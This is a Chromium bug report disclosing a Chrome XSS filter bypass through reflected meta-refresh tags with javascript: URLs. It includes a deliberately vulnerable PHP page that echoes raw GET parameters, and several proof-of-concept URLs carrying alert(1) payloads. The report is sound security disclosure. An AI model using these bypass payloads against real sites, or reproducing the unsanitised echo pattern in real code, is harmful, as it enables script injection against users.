http://code.google.com/p/chromium/issues/detail?id=94482 Reported by j.terh...@gmail.com, Today (4 hours ago) VULNERABILITY DETAILS A basic reflected XSS, using the <meta http-equiv="refresh" /> vector, is allowed by the XSS filter. VERSION Chrome Version: 13.0.782.215 m + stable Operating System: Windows NT 5.1 build 2600 (Windows XP Home Edition Service Pack 3) i586 REPRODUCTION CASE Place the attached php file in a web accessible directory of a php enabled apache server at http://<host>/xss.php and call: http://<host>/xss.php?refresh=javascript:alert(1) The alert is shown and no blocking message is posted to the console. However the call: http://<host>/xss.php?body=%3Cscript%3Ealert(1)%3C/script%3E _is_ blocked and the usual blocking message ("Refused to execute a JavaScript script. Source code of script found within request.") is posted to the console. See screenshots refresh.jpg and basic.jpg. ADDITIONAL: If line 4 of the php script is changed to: echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />"; the filter will also miss the reflected XSS if called as follows: http://<host>/xss.php?refresh=alert(1) Also if line 4 is changed to: echo "<meta http-equiv='refresh' {$_GET['refresh']} />"; and called using: http://<host>/xss.php?refresh=content=%220;%20url=javascript:alert(1)%22 the XSS is also allowed. _However_ if line 4 is changed to: echo "<meta {$_GET['refresh']} />"; and the call: http://<host>/xss.php?refresh=http-equiv=%22refresh%22%20content=%220;%20url=javascript:alert(1)%22 is made, the filter WILL detect the XSS (see screenshot refresh2.jpg) PHP Version: 5.3.5 Apache: Apache/2.2.17 (Win32) compiled with MSVC6 <html> <?php if( isset($_GET['refresh']) ) { //echo "<meta http-equiv='refresh' content='0; url={$_GET['refresh']}' />"; echo "<meta http-equiv='refresh' {$_GET['refresh']} />"; //echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />"; } ?> <body> <?php if( isset($_GET['body']) ) { echo $_GET['body']; } ?> </body> </html>